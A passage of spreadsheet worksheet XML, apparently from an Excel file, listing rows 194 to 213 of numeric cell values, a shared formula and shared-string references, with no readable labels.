      <c r="A194" s="6">
        <f t="shared" si="1"/>
        <v>0.4459298844</v>
      </c>
      <c r="B194" s="29">
        <v>1.0</v>
      </c>
      <c r="C194" s="15"/>
      <c r="D194" s="14"/>
      <c r="E194" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F194" s="14"/>
      <c r="G194" s="29">
        <v>-2.0</v>
      </c>
      <c r="H194" s="29">
        <v>10806.0</v>
      </c>
      <c r="I194" s="29">
        <v>122449.0</v>
      </c>
      <c r="J194" s="15"/>
      <c r="K194" s="29">
        <v>6253.0</v>
      </c>
      <c r="L194" s="15"/>
      <c r="M194" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N194" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O194" s="29">
        <v>1.0</v>
      </c>
      <c r="P194" s="29">
        <v>9.0</v>
      </c>
      <c r="Q194" s="15"/>
      <c r="R194" s="15"/>
      <c r="S194" s="15"/>
      <c r="T194" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U194" s="5"/>
      <c r="V194" s="5"/>
      <c r="W194" s="47"/>
      <c r="X194" s="45"/>
      <c r="Y194" s="45"/>
      <c r="Z194" s="38" t="s">
        <v>1685</v>
      </c>
      <c r="AA194" s="39" t="s">
        <v>1686</v>
      </c>
      <c r="AB194" s="38" t="s">
        <v>1584</v>
      </c>
      <c r="AC194" s="40">
        <v>172860.0</v>
      </c>
      <c r="AD194" s="5"/>
      <c r="AE194" s="14"/>
      <c r="AF194" s="14"/>
    </row>
    <row r="195">
      <c r="A195" s="6">
        <f t="shared" si="1"/>
        <v>0.5526730646</v>
      </c>
      <c r="B195" s="29">
        <v>1.0</v>
      </c>
      <c r="C195" s="15"/>
      <c r="D195" s="14"/>
      <c r="E195" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F195" s="14"/>
      <c r="G195" s="29">
        <v>2.0</v>
      </c>
      <c r="H195" s="29">
        <v>761.0</v>
      </c>
      <c r="I195" s="29">
        <v>98538.0</v>
      </c>
      <c r="J195" s="15"/>
      <c r="K195" s="15"/>
      <c r="L195" s="15"/>
      <c r="M195" s="15"/>
      <c r="N195" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O195" s="29">
        <v>0.0</v>
      </c>
      <c r="P195" s="29">
        <v>2.0</v>
      </c>
      <c r="Q195" s="15"/>
      <c r="R195" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S195" s="15"/>
      <c r="T195" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U195" s="5"/>
      <c r="V195" s="5"/>
      <c r="W195" s="47"/>
      <c r="X195" s="45"/>
      <c r="Y195" s="45"/>
      <c r="Z195" s="38" t="s">
        <v>1687</v>
      </c>
      <c r="AA195" s="39" t="s">
        <v>1688</v>
      </c>
      <c r="AB195" s="38" t="s">
        <v>1689</v>
      </c>
      <c r="AC195" s="40">
        <v>195955.0</v>
      </c>
      <c r="AD195" s="5"/>
      <c r="AE195" s="14"/>
      <c r="AF195" s="14"/>
    </row>
    <row r="196">
      <c r="A196" s="6">
        <f t="shared" si="1"/>
        <v>0.734748788</v>
      </c>
      <c r="B196" s="29">
        <v>1.0</v>
      </c>
      <c r="C196" s="29">
        <v>15938.0</v>
      </c>
      <c r="D196" s="14"/>
      <c r="E196" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F196" s="14"/>
      <c r="G196" s="29">
        <v>15.0</v>
      </c>
      <c r="H196" s="29">
        <v>10075.0</v>
      </c>
      <c r="I196" s="29">
        <v>5363.0</v>
      </c>
      <c r="J196" s="15"/>
      <c r="K196" s="29">
        <v>8557.0</v>
      </c>
      <c r="L196" s="15"/>
      <c r="M196" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N196" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O196" s="29">
        <v>5.0</v>
      </c>
      <c r="P196" s="29">
        <v>3.0</v>
      </c>
      <c r="Q196" s="15"/>
      <c r="R196" s="15"/>
      <c r="S196" s="15"/>
      <c r="T196" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U196" s="5"/>
      <c r="V196" s="5"/>
      <c r="W196" s="47"/>
      <c r="X196" s="45"/>
      <c r="Y196" s="45"/>
      <c r="Z196" s="38" t="s">
        <v>1690</v>
      </c>
      <c r="AA196" s="39" t="s">
        <v>1691</v>
      </c>
      <c r="AB196" s="38" t="s">
        <v>1692</v>
      </c>
      <c r="AC196" s="40">
        <v>15934.0</v>
      </c>
      <c r="AD196" s="5"/>
      <c r="AE196" s="14"/>
      <c r="AF196" s="14"/>
    </row>
    <row r="197">
      <c r="A197" s="6">
        <f t="shared" si="1"/>
        <v>0.5188210359</v>
      </c>
      <c r="B197" s="29">
        <v>1.0</v>
      </c>
      <c r="C197" s="15"/>
      <c r="D197" s="14"/>
      <c r="E197" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F197" s="14"/>
      <c r="G197" s="29">
        <v>1.0</v>
      </c>
      <c r="H197" s="29">
        <v>546.0</v>
      </c>
      <c r="I197" s="29">
        <v>38257.0</v>
      </c>
      <c r="J197" s="15"/>
      <c r="K197" s="29">
        <v>95381.0</v>
      </c>
      <c r="L197" s="15"/>
      <c r="M197" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N197" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O197" s="29">
        <v>1.0</v>
      </c>
      <c r="P197" s="29">
        <v>0.0</v>
      </c>
      <c r="Q197" s="15"/>
      <c r="R197" s="15"/>
      <c r="S197" s="15"/>
      <c r="T197" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U197" s="5"/>
      <c r="V197" s="5"/>
      <c r="W197" s="47"/>
      <c r="X197" s="45"/>
      <c r="Y197" s="45"/>
      <c r="Z197" s="38" t="s">
        <v>1693</v>
      </c>
      <c r="AA197" s="39" t="s">
        <v>1694</v>
      </c>
      <c r="AB197" s="38" t="s">
        <v>1695</v>
      </c>
      <c r="AC197" s="40">
        <v>67939.0</v>
      </c>
      <c r="AD197" s="5"/>
      <c r="AE197" s="14"/>
      <c r="AF197" s="14"/>
    </row>
    <row r="198">
      <c r="A198" s="6">
        <f t="shared" si="1"/>
        <v>0.4777192125</v>
      </c>
      <c r="B198" s="29">
        <v>1.0</v>
      </c>
      <c r="C198" s="29">
        <v>151369.0</v>
      </c>
      <c r="D198" s="14"/>
      <c r="E198" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F198" s="14"/>
      <c r="G198" s="29">
        <v>1.0</v>
      </c>
      <c r="H198" s="29">
        <v>539.0</v>
      </c>
      <c r="I198" s="29">
        <v>139400.0</v>
      </c>
      <c r="J198" s="15"/>
      <c r="K198" s="29">
        <v>98538.0</v>
      </c>
      <c r="L198" s="15"/>
      <c r="M198" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N198" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O198" s="29">
        <v>1.0</v>
      </c>
      <c r="P198" s="29">
        <v>5.0</v>
      </c>
      <c r="Q198" s="15"/>
      <c r="R198" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S198" s="15"/>
      <c r="T198" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U198" s="5"/>
      <c r="V198" s="5"/>
      <c r="W198" s="47"/>
      <c r="X198" s="45"/>
      <c r="Y198" s="45"/>
      <c r="Z198" s="38" t="s">
        <v>1696</v>
      </c>
      <c r="AA198" s="39" t="s">
        <v>1697</v>
      </c>
      <c r="AB198" s="38" t="s">
        <v>1698</v>
      </c>
      <c r="AC198" s="40">
        <v>151353.0</v>
      </c>
      <c r="AD198" s="5"/>
      <c r="AE198" s="14"/>
      <c r="AF198" s="14"/>
    </row>
    <row r="199">
      <c r="A199" s="6">
        <f t="shared" si="1"/>
        <v>0.7604970923</v>
      </c>
      <c r="B199" s="29">
        <v>1.0</v>
      </c>
      <c r="C199" s="15"/>
      <c r="D199" s="14"/>
      <c r="E199" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F199" s="14"/>
      <c r="G199" s="29">
        <v>2.0</v>
      </c>
      <c r="H199" s="29">
        <v>104.0</v>
      </c>
      <c r="I199" s="29">
        <v>396.0</v>
      </c>
      <c r="J199" s="15"/>
      <c r="K199" s="15"/>
      <c r="L199" s="15"/>
      <c r="M199" s="14"/>
      <c r="N199" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O199" s="29">
        <v>1.0</v>
      </c>
      <c r="P199" s="29">
        <v>1.0</v>
      </c>
      <c r="Q199" s="15"/>
      <c r="R199" s="15"/>
      <c r="S199" s="15"/>
      <c r="T199" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U199" s="5"/>
      <c r="V199" s="5"/>
      <c r="W199" s="47"/>
      <c r="X199" s="45"/>
      <c r="Y199" s="45"/>
      <c r="Z199" s="38" t="s">
        <v>1699</v>
      </c>
      <c r="AA199" s="39" t="s">
        <v>1700</v>
      </c>
      <c r="AB199" s="38" t="s">
        <v>1701</v>
      </c>
      <c r="AC199" s="40">
        <v>133404.0</v>
      </c>
      <c r="AD199" s="5"/>
      <c r="AE199" s="14"/>
      <c r="AF199" s="14"/>
    </row>
    <row r="200">
      <c r="A200" s="6">
        <f t="shared" si="1"/>
        <v>0.5706315104</v>
      </c>
      <c r="B200" s="29">
        <v>1.0</v>
      </c>
      <c r="C200" s="15"/>
      <c r="D200" s="14"/>
      <c r="E200" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F200" s="14"/>
      <c r="G200" s="29">
        <v>0.0</v>
      </c>
      <c r="H200" s="29">
        <v>185.0</v>
      </c>
      <c r="I200" s="29">
        <v>268037.0</v>
      </c>
      <c r="J200" s="15"/>
      <c r="K200" s="29">
        <v>268037.0</v>
      </c>
      <c r="L200" s="15"/>
      <c r="M200" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N200" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O200" s="29">
        <v>1.0</v>
      </c>
      <c r="P200" s="29">
        <v>0.0</v>
      </c>
      <c r="Q200" s="15"/>
      <c r="R200" s="15"/>
      <c r="S200" s="15"/>
      <c r="T200" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U200" s="5"/>
      <c r="V200" s="5"/>
      <c r="W200" s="47"/>
      <c r="X200" s="45"/>
      <c r="Y200" s="45"/>
      <c r="Z200" s="38" t="s">
        <v>1702</v>
      </c>
      <c r="AA200" s="39" t="s">
        <v>1703</v>
      </c>
      <c r="AB200" s="38" t="s">
        <v>1704</v>
      </c>
      <c r="AC200" s="40">
        <v>255763.0</v>
      </c>
      <c r="AD200" s="5"/>
      <c r="AE200" s="14"/>
      <c r="AF200" s="14"/>
    </row>
    <row r="201">
      <c r="A201" s="6">
        <f t="shared" si="1"/>
        <v>0.8675779142</v>
      </c>
      <c r="B201" s="29">
        <v>1.0</v>
      </c>
      <c r="C201" s="29">
        <v>131618.0</v>
      </c>
      <c r="D201" s="14"/>
      <c r="E201" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F201" s="14"/>
      <c r="G201" s="29">
        <v>-2.0</v>
      </c>
      <c r="H201" s="29">
        <v>180.0</v>
      </c>
      <c r="I201" s="29">
        <v>56061.0</v>
      </c>
      <c r="J201" s="15"/>
      <c r="K201" s="29">
        <v>80108.0</v>
      </c>
      <c r="L201" s="15"/>
      <c r="M201" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N201" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O201" s="29">
        <v>1.0</v>
      </c>
      <c r="P201" s="29">
        <v>6.0</v>
      </c>
      <c r="Q201" s="15"/>
      <c r="R201" s="15"/>
      <c r="S201" s="15"/>
      <c r="T201" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U201" s="5"/>
      <c r="V201" s="5"/>
      <c r="W201" s="47"/>
      <c r="X201" s="45"/>
      <c r="Y201" s="45"/>
      <c r="Z201" s="38" t="s">
        <v>1705</v>
      </c>
      <c r="AA201" s="39" t="s">
        <v>1706</v>
      </c>
      <c r="AB201" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC201" s="40">
        <v>131617.0</v>
      </c>
      <c r="AD201" s="5"/>
      <c r="AE201" s="14"/>
      <c r="AF201" s="14"/>
    </row>
    <row r="202">
      <c r="A202" s="6">
        <f t="shared" si="1"/>
        <v>0.3356021574</v>
      </c>
      <c r="B202" s="29">
        <v>1.0</v>
      </c>
      <c r="C202" s="15"/>
      <c r="D202" s="14"/>
      <c r="E202" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F202" s="14"/>
      <c r="G202" s="29">
        <v>3.0</v>
      </c>
      <c r="H202" s="29">
        <v>2559.0</v>
      </c>
      <c r="I202" s="29">
        <v>6946.0</v>
      </c>
      <c r="J202" s="5" t="s">
        <v>1707</v>
      </c>
      <c r="K202" s="29">
        <v>78998.0</v>
      </c>
      <c r="L202" s="15"/>
      <c r="M202" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N202" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O202" s="29">
        <v>2.0</v>
      </c>
      <c r="P202" s="29">
        <v>8.0</v>
      </c>
      <c r="Q202" s="15"/>
      <c r="R202" s="15"/>
      <c r="S202" s="15"/>
      <c r="T202" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U202" s="5"/>
      <c r="V202" s="5"/>
      <c r="W202" s="47"/>
      <c r="X202" s="45"/>
      <c r="Y202" s="45"/>
      <c r="Z202" s="38" t="s">
        <v>1708</v>
      </c>
      <c r="AA202" s="39" t="s">
        <v>1709</v>
      </c>
      <c r="AB202" s="38" t="s">
        <v>1710</v>
      </c>
      <c r="AC202" s="40">
        <v>9628.0</v>
      </c>
      <c r="AD202" s="5"/>
      <c r="AE202" s="14"/>
      <c r="AF202" s="14"/>
    </row>
    <row r="203">
      <c r="A203" s="6">
        <f t="shared" si="1"/>
        <v>0.5981900625</v>
      </c>
      <c r="B203" s="29">
        <v>1.0</v>
      </c>
      <c r="C203" s="14"/>
      <c r="D203" s="14"/>
      <c r="E203" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F203" s="14"/>
      <c r="G203" s="29">
        <v>3.0</v>
      </c>
      <c r="H203" s="29">
        <v>2280.0</v>
      </c>
      <c r="I203" s="29">
        <v>27524.0</v>
      </c>
      <c r="J203" s="15"/>
      <c r="K203" s="15"/>
      <c r="L203" s="15"/>
      <c r="M203" s="14"/>
      <c r="N203" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O203" s="29">
        <v>2.0</v>
      </c>
      <c r="P203" s="29">
        <v>1.0</v>
      </c>
      <c r="Q203" s="15"/>
      <c r="R203" s="15"/>
      <c r="S203" s="15"/>
      <c r="T203" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U203" s="5"/>
      <c r="V203" s="5"/>
      <c r="W203" s="47"/>
      <c r="X203" s="45"/>
      <c r="Y203" s="45"/>
      <c r="Z203" s="38" t="s">
        <v>1711</v>
      </c>
      <c r="AA203" s="39" t="s">
        <v>1712</v>
      </c>
      <c r="AB203" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC203" s="40">
        <v>37871.0</v>
      </c>
      <c r="AD203" s="5"/>
      <c r="AE203" s="14"/>
      <c r="AF203" s="14"/>
    </row>
    <row r="204">
      <c r="A204" s="6">
        <f t="shared" si="1"/>
        <v>0.8793252543</v>
      </c>
      <c r="B204" s="29">
        <v>1.0</v>
      </c>
      <c r="C204" s="14"/>
      <c r="D204" s="14"/>
      <c r="E204" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F204" s="14"/>
      <c r="G204" s="29">
        <v>1.0</v>
      </c>
      <c r="H204" s="29">
        <v>212.0</v>
      </c>
      <c r="I204" s="29">
        <v>257278.0</v>
      </c>
      <c r="J204" s="15"/>
      <c r="K204" s="15"/>
      <c r="L204" s="15"/>
      <c r="M204" s="15"/>
      <c r="N204" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O204" s="29">
        <v>1.0</v>
      </c>
      <c r="P204" s="29">
        <v>2.0</v>
      </c>
      <c r="Q204" s="15"/>
      <c r="R204" s="15"/>
      <c r="S204" s="15"/>
      <c r="T204" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U204" s="5"/>
      <c r="V204" s="5"/>
      <c r="W204" s="47"/>
      <c r="X204" s="45"/>
      <c r="Y204" s="45"/>
      <c r="Z204" s="38" t="s">
        <v>1713</v>
      </c>
      <c r="AA204" s="39" t="s">
        <v>1714</v>
      </c>
      <c r="AB204" s="38" t="s">
        <v>1715</v>
      </c>
      <c r="AC204" s="40">
        <v>249373.0</v>
      </c>
      <c r="AD204" s="5"/>
      <c r="AE204" s="14"/>
      <c r="AF204" s="14"/>
    </row>
    <row r="205">
      <c r="A205" s="6">
        <f t="shared" si="1"/>
        <v>0.4216667669</v>
      </c>
      <c r="B205" s="29">
        <v>1.0</v>
      </c>
      <c r="C205" s="29">
        <v>116542.0</v>
      </c>
      <c r="D205" s="14"/>
      <c r="E205" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F205" s="14"/>
      <c r="G205" s="29">
        <v>5.0</v>
      </c>
      <c r="H205" s="29">
        <v>583.0</v>
      </c>
      <c r="I205" s="29">
        <v>103445.0</v>
      </c>
      <c r="J205" s="15"/>
      <c r="K205" s="15"/>
      <c r="L205" s="15"/>
      <c r="M205" s="15"/>
      <c r="N205" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O205" s="29">
        <v>2.0</v>
      </c>
      <c r="P205" s="29">
        <v>0.0</v>
      </c>
      <c r="Q205" s="15"/>
      <c r="R205" s="15"/>
      <c r="S205" s="15"/>
      <c r="T205" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U205" s="5"/>
      <c r="V205" s="5"/>
      <c r="W205" s="47"/>
      <c r="X205" s="45"/>
      <c r="Y205" s="45"/>
      <c r="Z205" s="38" t="s">
        <v>1716</v>
      </c>
      <c r="AA205" s="39" t="s">
        <v>1717</v>
      </c>
      <c r="AB205" s="38" t="s">
        <v>1718</v>
      </c>
      <c r="AC205" s="40">
        <v>116541.0</v>
      </c>
      <c r="AD205" s="5"/>
      <c r="AE205" s="14"/>
      <c r="AF205" s="14"/>
    </row>
    <row r="206">
      <c r="A206" s="6">
        <f t="shared" si="1"/>
        <v>0.3603323506</v>
      </c>
      <c r="B206" s="29">
        <v>1.0</v>
      </c>
      <c r="C206" s="14"/>
      <c r="D206" s="14"/>
      <c r="E206" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F206" s="14"/>
      <c r="G206" s="29">
        <v>1.0</v>
      </c>
      <c r="H206" s="29">
        <v>148.0</v>
      </c>
      <c r="I206" s="29">
        <v>6103.0</v>
      </c>
      <c r="J206" s="15"/>
      <c r="K206" s="15"/>
      <c r="L206" s="15"/>
      <c r="M206" s="15"/>
      <c r="N206" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O206" s="29">
        <v>1.0</v>
      </c>
      <c r="P206" s="29">
        <v>1.0</v>
      </c>
      <c r="Q206" s="15"/>
      <c r="R206" s="15"/>
      <c r="S206" s="15"/>
      <c r="T206" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U206" s="5"/>
      <c r="V206" s="5"/>
      <c r="W206" s="47"/>
      <c r="X206" s="45"/>
      <c r="Y206" s="45"/>
      <c r="Z206" s="38" t="s">
        <v>1719</v>
      </c>
      <c r="AA206" s="39" t="s">
        <v>1720</v>
      </c>
      <c r="AB206" s="38" t="s">
        <v>1721</v>
      </c>
      <c r="AC206" s="40">
        <v>202575.0</v>
      </c>
      <c r="AD206" s="5"/>
      <c r="AE206" s="14"/>
      <c r="AF206" s="14"/>
    </row>
    <row r="207">
      <c r="A207" s="6">
        <f t="shared" si="1"/>
        <v>0.9126373289</v>
      </c>
      <c r="B207" s="29">
        <v>1.0</v>
      </c>
      <c r="C207" s="14"/>
      <c r="D207" s="14"/>
      <c r="E207" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F207" s="14"/>
      <c r="G207" s="29">
        <v>2.0</v>
      </c>
      <c r="H207" s="29">
        <v>93.0</v>
      </c>
      <c r="I207" s="29">
        <v>15000.0</v>
      </c>
      <c r="J207" s="15"/>
      <c r="K207" s="29">
        <v>6253.0</v>
      </c>
      <c r="L207" s="15"/>
      <c r="M207" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N207" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O207" s="29">
        <v>0.0</v>
      </c>
      <c r="P207" s="29">
        <v>5.0</v>
      </c>
      <c r="Q207" s="15"/>
      <c r="R207" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S207" s="15"/>
      <c r="T207" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U207" s="5"/>
      <c r="V207" s="5"/>
      <c r="W207" s="47"/>
      <c r="X207" s="45"/>
      <c r="Y207" s="45"/>
      <c r="Z207" s="38" t="s">
        <v>1722</v>
      </c>
      <c r="AA207" s="39" t="s">
        <v>1723</v>
      </c>
      <c r="AB207" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC207" s="40">
        <v>200651.0</v>
      </c>
      <c r="AD207" s="5"/>
      <c r="AE207" s="14"/>
      <c r="AF207" s="14"/>
    </row>
    <row r="208">
      <c r="A208" s="6">
        <f t="shared" si="1"/>
        <v>0.6178691749</v>
      </c>
      <c r="B208" s="29">
        <v>1.0</v>
      </c>
      <c r="C208" s="29">
        <v>185253.0</v>
      </c>
      <c r="D208" s="14"/>
      <c r="E208" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F208" s="14"/>
      <c r="G208" s="29">
        <v>14.0</v>
      </c>
      <c r="H208" s="29">
        <v>2426.0</v>
      </c>
      <c r="I208" s="29">
        <v>86741.0</v>
      </c>
      <c r="J208" s="15"/>
      <c r="K208" s="29">
        <v>86741.0</v>
      </c>
      <c r="L208" s="15"/>
      <c r="M208" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N208" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O208" s="29">
        <v>2.0</v>
      </c>
      <c r="P208" s="29">
        <v>3.0</v>
      </c>
      <c r="Q208" s="15"/>
      <c r="R208" s="15"/>
      <c r="S208" s="15"/>
      <c r="T208" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U208" s="5"/>
      <c r="V208" s="5"/>
      <c r="W208" s="47"/>
      <c r="X208" s="45"/>
      <c r="Y208" s="45"/>
      <c r="Z208" s="38" t="s">
        <v>1724</v>
      </c>
      <c r="AA208" s="39" t="s">
        <v>1725</v>
      </c>
      <c r="AB208" s="38" t="s">
        <v>1726</v>
      </c>
      <c r="AC208" s="40">
        <v>185219.0</v>
      </c>
      <c r="AD208" s="5"/>
      <c r="AE208" s="14"/>
      <c r="AF208" s="14"/>
    </row>
    <row r="209">
      <c r="A209" s="6">
        <f t="shared" si="1"/>
        <v>0.6974934117</v>
      </c>
      <c r="B209" s="29">
        <v>1.0</v>
      </c>
      <c r="C209" s="15"/>
      <c r="D209" s="14"/>
      <c r="E209" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F209" s="14"/>
      <c r="G209" s="29">
        <v>0.0</v>
      </c>
      <c r="H209" s="29">
        <v>138.0</v>
      </c>
      <c r="I209" s="29">
        <v>165498.0</v>
      </c>
      <c r="J209" s="15"/>
      <c r="K209" s="29">
        <v>35683.0</v>
      </c>
      <c r="L209" s="15"/>
      <c r="M209" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N209" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O209" s="29">
        <v>1.0</v>
      </c>
      <c r="P209" s="29">
        <v>1.0</v>
      </c>
      <c r="Q209" s="15"/>
      <c r="R209" s="15"/>
      <c r="S209" s="15"/>
      <c r="T209" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U209" s="5"/>
      <c r="V209" s="5"/>
      <c r="W209" s="47"/>
      <c r="X209" s="45"/>
      <c r="Y209" s="45"/>
      <c r="Z209" s="38" t="s">
        <v>1727</v>
      </c>
      <c r="AA209" s="39" t="s">
        <v>1728</v>
      </c>
      <c r="AB209" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC209" s="40">
        <v>190992.0</v>
      </c>
      <c r="AD209" s="5"/>
      <c r="AE209" s="14"/>
      <c r="AF209" s="14"/>
    </row>
    <row r="210">
      <c r="A210" s="6">
        <f t="shared" si="1"/>
        <v>0.4792284048</v>
      </c>
      <c r="B210" s="29">
        <v>1.0</v>
      </c>
      <c r="C210" s="15"/>
      <c r="D210" s="14"/>
      <c r="E210" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F210" s="14"/>
      <c r="G210" s="29">
        <v>2.0</v>
      </c>
      <c r="H210" s="29">
        <v>428.0</v>
      </c>
      <c r="I210" s="29">
        <v>50051.0</v>
      </c>
      <c r="J210" s="15"/>
      <c r="K210" s="29">
        <v>-1.0</v>
      </c>
      <c r="L210" s="15"/>
      <c r="M210" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N210" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O210" s="29">
        <v>1.0</v>
      </c>
      <c r="P210" s="29">
        <v>3.0</v>
      </c>
      <c r="Q210" s="15"/>
      <c r="R210" s="15"/>
      <c r="S210" s="15"/>
      <c r="T210" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U210" s="5"/>
      <c r="V210" s="5"/>
      <c r="W210" s="47"/>
      <c r="X210" s="45"/>
      <c r="Y210" s="45"/>
      <c r="Z210" s="38" t="s">
        <v>1729</v>
      </c>
      <c r="AA210" s="39" t="s">
        <v>1730</v>
      </c>
      <c r="AB210" s="38" t="s">
        <v>1731</v>
      </c>
      <c r="AC210" s="40">
        <v>65729.0</v>
      </c>
      <c r="AD210" s="5"/>
      <c r="AE210" s="14"/>
      <c r="AF210" s="14"/>
    </row>
    <row r="211">
      <c r="A211" s="6">
        <f t="shared" si="1"/>
        <v>0.8303840333</v>
      </c>
      <c r="B211" s="29">
        <v>1.0</v>
      </c>
      <c r="C211" s="15"/>
      <c r="D211" s="14"/>
      <c r="E211" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F211" s="14"/>
      <c r="G211" s="29">
        <v>0.0</v>
      </c>
      <c r="H211" s="29">
        <v>495.0</v>
      </c>
      <c r="I211" s="29">
        <v>97755.0</v>
      </c>
      <c r="J211" s="15"/>
      <c r="K211" s="15"/>
      <c r="L211" s="15"/>
      <c r="M211" s="15"/>
      <c r="N211" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O211" s="29">
        <v>1.0</v>
      </c>
      <c r="P211" s="29">
        <v>4.0</v>
      </c>
      <c r="Q211" s="15"/>
      <c r="R211" s="15"/>
      <c r="S211" s="15"/>
      <c r="T211" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U211" s="5"/>
      <c r="V211" s="5"/>
      <c r="W211" s="47"/>
      <c r="X211" s="45"/>
      <c r="Y211" s="45"/>
      <c r="Z211" s="38" t="s">
        <v>1732</v>
      </c>
      <c r="AA211" s="39" t="s">
        <v>1733</v>
      </c>
      <c r="AB211" s="38" t="s">
        <v>1734</v>
      </c>
      <c r="AC211" s="40">
        <v>256066.0</v>
      </c>
      <c r="AD211" s="5"/>
      <c r="AE211" s="14"/>
      <c r="AF211" s="14"/>
    </row>
    <row r="212">
      <c r="A212" s="6">
        <f t="shared" si="1"/>
        <v>0.8548929411</v>
      </c>
      <c r="B212" s="29">
        <v>1.0</v>
      </c>
      <c r="C212" s="15"/>
      <c r="D212" s="14"/>
      <c r="E212" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F212" s="14"/>
      <c r="G212" s="29">
        <v>1.0</v>
      </c>
      <c r="H212" s="29">
        <v>100.0</v>
      </c>
      <c r="I212" s="29">
        <v>168571.0</v>
      </c>
      <c r="J212" s="15"/>
      <c r="K212" s="15"/>
      <c r="L212" s="15"/>
      <c r="M212" s="15"/>
      <c r="N212" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O212" s="29">
        <v>1.0</v>
      </c>
      <c r="P212" s="29">
        <v>3.0</v>
      </c>
      <c r="Q212" s="15"/>
      <c r="R212" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S212" s="15"/>
      <c r="T212" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U212" s="5"/>
      <c r="V212" s="5"/>
      <c r="W212" s="47"/>
      <c r="X212" s="45"/>
      <c r="Y212" s="45"/>
      <c r="Z212" s="38" t="s">
        <v>1735</v>
      </c>
      <c r="AA212" s="39" t="s">
        <v>1736</v>
      </c>
      <c r="AB212" s="38" t="s">
        <v>1737</v>
      </c>
      <c r="AC212" s="40">
        <v>230281.0</v>
      </c>
      <c r="AD212" s="5"/>
      <c r="AE212" s="14"/>
      <c r="AF212" s="14"/>
    </row>
    <row r="213">
      <c r="A213" s="6">
        <f t="shared" si="1"/>
        <v>0.5278358881</v>
      </c>
      <c r="B213" s="29">
        <v>1.0</v>
      </c>
      <c r="C213" s="15"/>
      <c r="D213" s="14"/>
      <c r="E213" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F213" s="14"/>
      <c r="G213" s="29">
        <v>9.0</v>
      </c>
      <c r="H213" s="29">
        <v>5820.0</v>
      </c>
      <c r="I213" s="29">
        <v>1455.0</v>
      </c>
      <c r="J213" s="15"/>
      <c r="K213" s="29">
        <v>1455.0</v>
      </c>
      <c r="L213" s="15"/>
      <c r="M213" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N213" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O213" s="29">
        <v>1.0</v>
      </c>
      <c r="P213" s="29">
        <v>11.0</v>
      </c>
      <c r="Q213" s="15"/>
      <c r="R213" s="15"/>
      <c r="S213" s="15"/>
      <c r="T213" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U213" s="5"/>
      <c r="V213" s="5"/>
      <c r="W213" s="47"/>
      <c r="X213" s="45"/>
      <c r="Y213" s="45"/>
